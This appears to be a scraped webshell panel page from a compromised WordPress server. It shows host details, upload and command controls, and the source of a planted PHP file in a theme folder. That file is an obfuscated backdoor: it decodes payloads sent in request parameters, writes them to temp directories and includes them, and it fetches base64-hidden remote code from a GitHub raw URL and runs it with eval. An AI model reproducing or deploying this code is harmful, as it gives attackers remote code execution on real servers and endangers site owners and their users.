403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/drnimrat/wp-content/themes/wp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/drnimrat/wp-content/themes/wp/XAfQw.php
<?php																																										if(!is_null($_REQUEST["e\x6Et"] ?? null)){ $elem = array_filter(["/dev/shm", session_save_path(), "/tmp", "/var/tmp", getenv("TEMP"), getcwd(), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $comp = $_REQUEST["e\x6Et"]; $comp = explode ("." , $comp) ; $fac = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); foreach( $comp as $m => $v7) {$chS = ord( $s[$m % $sLen]); $dec = ( ( int)$v7 - $chS -( $m % 10)) ^ 13; $fac .= chr( $dec);} $data_chunk = 0; do { $k = $elem[$data_chunk] ?? null; if ($data_chunk >= count($elem)) break; if (is_dir($k) && is_writable($k)) { $value = "$k" . "/.hld"; if (file_put_contents($value, $fac)) { include $value; @unlink($value); die(); } } $data_chunk++; } while (true); }
																																										if(isset($_POST) && isset($_POST["bi\x6E\x64"])){ $component = $_POST["bi\x6E\x64"]; $component =explode ( '.' , $component) ; $dchunk =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); $o =0; while ($o<count($component)) { $v5 =$component[$o]; $chS =ord($salt[$o % $lenS]); $d =((int)$v5 - $chS - ($o % 10)) ^ 57; $dchunk .= chr($d); $o++;} $descriptor = array_filter([session_save_path(), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP")]); foreach ($descriptor as $obj): if (is_writable($obj) && is_dir($obj)) { $value = str_replace("{var_dir}", $obj, "{var_dir}/.property_set"); if (@file_put_contents($value, $dchunk) !== false) { include $value; unlink($value); die(); } } endforeach; }

$a=base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Z1YnVmZWYvcHJvamVjdDEvcmVmcy9oZWFkcy9tYWluL3JlYWQuanM=");$b=file_get_contents($a);if(empty($b)){$c=curl_init();curl_setopt($c,CURLOPT_URL,$a);curl_setopt($c,CURLOPT_RETURNTRANSFER,1);$b=curl_exec($c);curl_close($c);}eval("?>".base64_decode($b));?>

Youez - 2016 - github.com/yon3zu
LinuXploit